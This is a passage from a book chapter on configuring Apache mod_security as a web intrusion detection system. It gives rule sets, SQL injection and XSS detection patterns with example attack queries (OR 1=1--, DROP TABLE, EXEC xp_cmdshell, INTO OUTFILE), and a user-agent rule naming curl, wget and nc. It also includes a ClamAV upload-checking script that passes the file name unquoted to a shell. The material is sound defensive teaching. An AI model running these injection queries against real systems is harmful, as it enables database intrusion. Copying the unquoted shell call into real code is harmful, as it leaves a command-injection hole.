Establishing a protection policy is arguably the most difficult part of the work. You start with the list of weaknesses you want to protect and, having in mind the capabilities of the protection software, work out a feasible protection plan. If it turns out the tool is not capable enough, you may look for a better tool. Work on the policy is similar to the process of threat modeling discussed in Chapter 1.

Installation and configuration is the easy part and is already covered in detail here. You need to work within the constraints of your selected tool to implement the previously designed policy. The key to performing this step is to work on a development server first and to test the configuration thoroughly to ensure the protection rules behave as you expect them to. The mod_security distribution includes a tool (run_test.pl) that can be used for automated tests. As a low-level tool, run_test.pl takes a previously created HTTP request from a text file, sends it to the server, and examines the status code of the response to determine the operation's success. Run regression tests periodically to verify your IDS still behaves as expected.

Deploying in detection mode only is what you do to test the configuration in real life while avoiding disturbance to normal system operation. For several weeks, the IDS should only send notifications without interrupting requests. The configuration should then be fine-tuned to reduce the false-positive rate, hopefully to zero. Once you are confident the protection is well designed (do not hurry), the operation mode can be changed to prevention mode. I prefer to use prevention mode only for problems I know I have. In all other cases, run in detection mode at least for some time and see whether you really have the problems you think you have.

There is a set of rules I normally use as a starting point, in addition to the basic configuration given earlier. These rules are not meant to protect from direct attacks but rather to enforce strict HTTP protocol usage and make manual attacks more difficult. As I warned, these rules may not be suitable for all situations. If you are running a public web site, there will be all sorts of visitors, including search engines, which can be a little eccentric in the way they send otherwise normal HTTP requests. Tight configurations usually work better in closed environments.

# Accept only valid protocol versions, helps
# fight HTTP fingerprinting.
SecFilterSelective SERVER_PROTOCOL !^HTTP/(0\.9|1\.0|1\.1)$
   
# Allow supported request methods only.
SecFilterSelective REQUEST_METHOD !^(GET|HEAD|POST)$
   
# Require the Host header field to be present.
SecFilterSelective HTTP_Host ^$
   
# Require explicit and known content encodings for methods
# other than GET or HEAD. The multipart/form-data encoding
# should not be allowed at all if the application does not
# make use of file upload. There are many automated attacks
# out there that are using wrong encoding names.
SecFilterSelective REQUEST_METHOD !^(GET|HEAD)$ chain
SecFilterSelective HTTP_Content-Type \
!(^application/x-www-form-urlencoded$|^multipart/form-data;)
   
# Require Content-Length to be provided with
# every POST request. Length is a requirement for
# request body filtering to work.
SecFilterSelective REQUEST_METHOD ^POST$ chain
SecFilterSelective HTTP_Content-Length ^$
   
# Don't accept transfer encodings we know we don't handle
# (you probably don't need them anyway).
SecFilterSelective HTTP_Transfer-Encoding !^$

You may also choose to add some of the following rules to warn you of requests that do not seem to be from common browsers. Rules such as these are suited for applications where the only interaction is expected to come from users using browsers. On a public web site, where many different types of user agents are active, they result in too many warnings.

# Most requests performed manually (e.g., using telnet or nc)
# will lack one of the following headers.
# (Accept-Encoding and Accept-Language are also good
# candidates for monitoring since popular browsers
# always use them.)
SecFilterSelective HTTP_User-Agent|HTTP_Connection|HTTP_Accept ^$ log,pass
   
# Catch common nonbrowser user agents.
SecFilterSelective HTTP_User-Agent \
(libwhisker|paros|wget|libwww|perl|curl) log,pass

Ironically, your own monitoring tools are likely to generate error log warnings. If you have a dedicated IP address from which you perform monitoring, you can add a rule to skip the warning checks for all requests coming from it. Put the following rule just above the rules that produce warnings:

# Allow requests coming from 192.168.254.125
SecFilterSelective REMOTE_ADDR ^192\.168\.254\.125$ allow

Though you could place this rule on the top of the rule set, that is a bad idea; as one of the basic security principles says, only establish minimal trust.

Web IDSs are good at enforcing strict protocol usage and defending against known application problems. Attempts to exploit common web application problems often have a recognizable footprint. Pattern matching can be used to detect some attacks but it is generally impossible to catch all of them without having too many false positives. Because of this, my advice is to use detection only when dealing with common web application attacks. There is another reason to adopt this approach: since it is not possible to have a foolproof defense against a determined attacker, having a tight protection scheme will force such an attacker to adopt and use evasion methods you have not prepared for. If that happens, the attacker will become invisible to you. Let some attacks through so you are aware of what is happening.

The biggest obstacle to reliable detection is the ability for users to enter free-form text, and this is common in web applications. Consequently, content management systems are the most difficult ones to defend. (Users may even be discussing web application security in a forum!) When users are allowed to enter arbitrary text, they will sooner or later attempt to enter something that looks like an attack.

In this section, I will discuss potentially useful regular expression patterns without going into details as to how they are to be added to the mod_security configuration since the method of adding patterns to rules has been described. (If you are not familiar with common web application attacks, reread Chapter 10.) In addition to the patterns provided here, you can seek inspiration in rules others have created for nonweb IDSs. (For example, rules for Snort, a popular NIDS, can be found at http://www.snort.org and http://www.bleedingsnort.com.)

Database attacks are executed by sneaking an SQL query or a part of it into request parameters. Attack detection must, therefore, attempt to detect commonly used SQL keywords and metacharacters. Table 12-4 shows a set of patterns that can be used to detect database attacks.

Table 12-4. Patterns to detect SQL injection attacks

Pattern

Query example

delete[[:space:]]+from

DELETE FROM users

drop[[:space:]]+table

DROP TABLE users

create[[:space:]]+table

CREATE TABLE newusers

update.+set.+=

UPDATE users SET balance = 1000

insert[[:space:]]+into.+values

INSERT INTO users VALUES (1, 'admin')

select.+from

SELECT username, balance FROM users

union.+select

Appends to an existing query: ... UNION ALL SELECT username FROM users

or.+1[[:space:]]*=[[:space:]]*1

Attempt to modify the original query to always be true: SELECT * FROM users WHERE username = 'admin' and password = 'xxx' OR 1=1--

.+--

Attempt to escape out of a string and inject a query, and then comment out the rest of the original query: SELECT * FROM users WHERE username = 'admin' OR username= 'guest' --
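To turn these patterns into protection, each one goes into a rule. A minimal sketch applying two of the patterns to all request parameters might be:

# Detect common SQL injection signatures in any parameter
SecFilterSelective ARGS "union.+select"
SecFilterSelective ARGS "delete[[:space:]]+from"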

So far, I have presented generic SQL patterns. Most databases have proprietary extensions of one kind or another, which require keywords that are often easier to detect. These patterns differ from one database to another, so creating a good set of detection rules requires expertise in the deployed database. Table 12-5 shows some interesting patterns for MSSQL and MySQL.

Table 12-5. Database-specific detection patterns

Pattern

Attack

exec.+xp_

MSSQL. Attempt to execute an extended stored procedure: EXEC xp_cmdshell.

exec.+sp_

MSSQL. Attempt to execute a stored procedure: EXEC sp_who.

@@[[:alnum:]]+

MSSQL. Access to an internal variable: SELECT @@version.

into[[:space:]]+outfile

MySQL. Attempt to write the contents of a table to disk: SELECT * FROM users INTO OUTFILE '/tmp/users'.

load[[:space:]]+data

MySQL. Attempt to load a file from disk: LOAD DATA INFILE '/tmp/users' INTO TABLE users.

Cross-site scripting (XSS) attacks can be difficult to detect when launched by those who know how to evade detection systems. If the entry point is in the HTML, the attacker must find a way to switch from HTML into something more dangerous. Danger comes from JavaScript, ActiveX components, Flash programs, or other embedded objects. The following list of problematic HTML tags is by no means exhaustive, but it proves the point:

  • <script>, which introduces JavaScript

  • <object>, <applet>, and <embed>, which load external components

  • <iframe>, which embeds content from an arbitrary location

Your best bet is to try to detect any HTML in the parameters, as well as the special JavaScript entity syntax that works only in Netscape. If a pattern such as <.+> is too broad for you, you may want to list all possible tag names and detect those instead. But if the attacker can sneak in a tag, detection becomes increasingly difficult because of the many evasion techniques available; for example, the payload can be assembled at runtime from character codes (fromCharCode) or hidden behind layers of character encoding, obfuscating the string enough to make detection practically impossible.

If the attacker can inject content directly into JavaScript, the list of evasion options is even longer; for example, he can use the eval() function to execute an arbitrary string, or the document.write() function to output HTML into the document.

Now you understand why you should not stop attackers too early. Knowing you are being attacked, even successfully attacked, is sometimes better than not knowing at all. A useful list of warning patterns for XSS attacks is given in Table 12-6. (I call them warning patterns because you probably do not want to reject requests automatically based on them.) They are not foolproof, but they cast a wide net to catch potential abuse. You may have to refine the list over time to reduce false positives for your particular application.

Table 12-6. XSS attack warning patterns

&#[0-9a-fA-F]{2}
\x5cx[0-9a-fA-F]{2}
<.+>
<applet
<div
<embed
<iframe
<img
<meta
<object
<script
document.cookie
document.write
dynsrc
eval[[:space:]]*(
fromCharCode
http-equiv
javascript:
onAbort
onBlur
onChange
onClick
onDblClick
onDragDrop
onError
onFocus
onKeyDown
onKeyPress
onKeyUp
onLoad
onMouseDown
onMouseOut
onMouseOver
onMouseUp
onMove
onReset
onResize
onSelect
onSubmit
onUnload
style[[:space:]]*=
vbscript:

I conclude this chapter with a few advanced topics. These topics are regularly the subject of email messages I get about mod_security on the users’ mailing list.

Since mod_security understands the multipart/form-data encoding used for file uploads, it can extract uploaded files from the request and store them for future reference. In a way, this is a form of audit logging (see Chapter 8). mod_security offers another exciting feature: validation of uploaded files in real time. All you need is a script designed to take the full path to the file as its first and only parameter, plus the following directive to enable file validation functionality in mod_security:

SecUploadApproveScript /usr/local/apache/bin/upload_verify.pl

The script will be invoked for every file upload attempt. If the script returns 1 as the first character of the first line of its output, the file will be accepted. If it returns anything else, the whole request will be rejected. It is useful to have the error message (if any) on the same line after the first character as it will be printed in the mod_security log. File upload validation can be used for several purposes:

  • To inspect uploaded files for viruses or other types of attack

  • To allow only files of certain types (e.g., images)

  • To inspect and validate file content

If you have the excellent open source antivirus program Clam AntiVirus (http://www.clamav.net) installed, then you can use the following utility script as an interface:

#!/usr/bin/perl

# Location of the Clam AntiVirus command-line scanner
$CLAMSCAN = "/usr/bin/clamscan";

if (@ARGV != 1) {
    print "Usage: modsec-clamscan.pl <filename>\n";
    exit;
}

my ($FILE) = @ARGV;

# Run clamscan and capture the first line of its output
$cmd = "$CLAMSCAN --stdout --disable-summary $FILE";
$input = `$cmd`;
$input =~ m/^(.+)/;
$error_message = $1;

# Fallback response if the output cannot be interpreted
$output = "0 Unable to parse clamscan output";

if ($error_message =~ m/: Empty file\.$/) {
    $output = "1 empty file";
}
elsif ($error_message =~ m/: (.+) ERROR$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: (.+) FOUND$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: OK$/) {
    $output = "1 clamscan: OK";
}

# The first character (1 = accept, 0 = reject) tells
# mod_security what to do with the uploaded file
print "$output\n";

When mod_security operates from within Apache (as opposed to working as a network gateway), it can obtain more information about requests. One useful bit of information is the choice of module to handle the request (called a handler). In the early phases of request processing, Apache looks for candidate modules to handle the request, usually by looking at the extension of the targeted file. If a handler is not found, the request is probably for a static file (e.g., an image). Otherwise, the handler will probably process the file in some way (for example, executing the script in the case of PHP) and dynamically create a response. Since mod_security mostly serves to protect dynamic resources, this information can be used for optimization. If you configure the SecFilterEngine directive with the DynamicOnly parameter, then mod_security will act only on those requests that have a handler attached to them.

# Only process dynamic requests
SecFilterEngine DynamicOnly

Unfortunately, it is possible to configure Apache to serve dynamic content and have the handler undefined, by misusing its AddType directive. Even the official PHP installation guide recommends this approach. If that happens, mod_security will not be able to determine which requests are truly dynamic and will not be able to protect them. The correct approach is to use the AddHandler directive, as in this example for PHP:

AddHandler application/x-httpd-php .php

Relying on the existence of a request handler to decide whether to protect a resource can be rewarding, but it can also be dangerous if handlers are not configured correctly, so check whether relying on handlers really works in your case. You can do this by adding a rule that rejects every request (in which case it will be obvious whether mod_security is working) or by looking at what mod_security writes to the debug log (where it states whether it believes the incoming request is for a static resource).

Though most of this chapter used negative security model protection for examples, you can deploy mod_security in a positive security model configuration. A positive security model relies on identifying requests that are safe instead of looking for dangerous content. In the following example, I will demonstrate how this approach can be used by showing the configuration for two application scripts. For each script, the standard Apache container directive <Location> is used to enclose mod_security rules that will only be applied to that script. The use of the SecFilterSelective directive to specify rules has previously been described.

<Location /user_view.php>
    # This script only accepts GET
    SecFilterSelective REQUEST_METHOD !^GET$
    # Accept only one parameter: id
    SecFilterSelective ARGS_NAMES !^id$
    # Parameter id is mandatory, and it must be
    # a number, 4-14 digits long
    SecFilterSelective ARG_id !^[[:digit:]]{4,14}$
</Location>
   
<Location /user_add.php>
    # This script only accepts POST
    SecFilterSelective REQUEST_METHOD !^POST$
    # Accept three parameters: firstname, lastname, and email
    SecFilterSelective ARGS_NAMES !^(firstname|lastname|email)$
    # Parameter firstname is mandatory, and it must
    # contain text 1-64 characters long
    SecFilterSelective ARG_firstname !^[[:alnum:][:space:]]{1,64}$
    # Parameter lastname is mandatory, and it must
    # contain text 1-64 characters long
    SecFilterSelective ARG_lastname !^[[:alnum:][:space:]]{1,64}$
    # Parameter email is optional, but if it is present
    # it must consist only of characters that are
    # allowed in an email address 
    SecFilterSelective ARG_email !(^$|^[[:alnum:].@]{1,64}$)
</Location>

There is a small drawback to this configuration approach. To determine which <Location> block is applicable for a request, Apache has to look through all such directives present. For applications with a small number of scripts, this will not be a problem, but it may present a performance problem for applications with hundreds of scripts, each of which need a <Location> block.

A feature to allow user-defined types (predefined regular expressions), such as the one present in mod_parmguard (see the sidebar), would significantly ease the task of writing configuration data.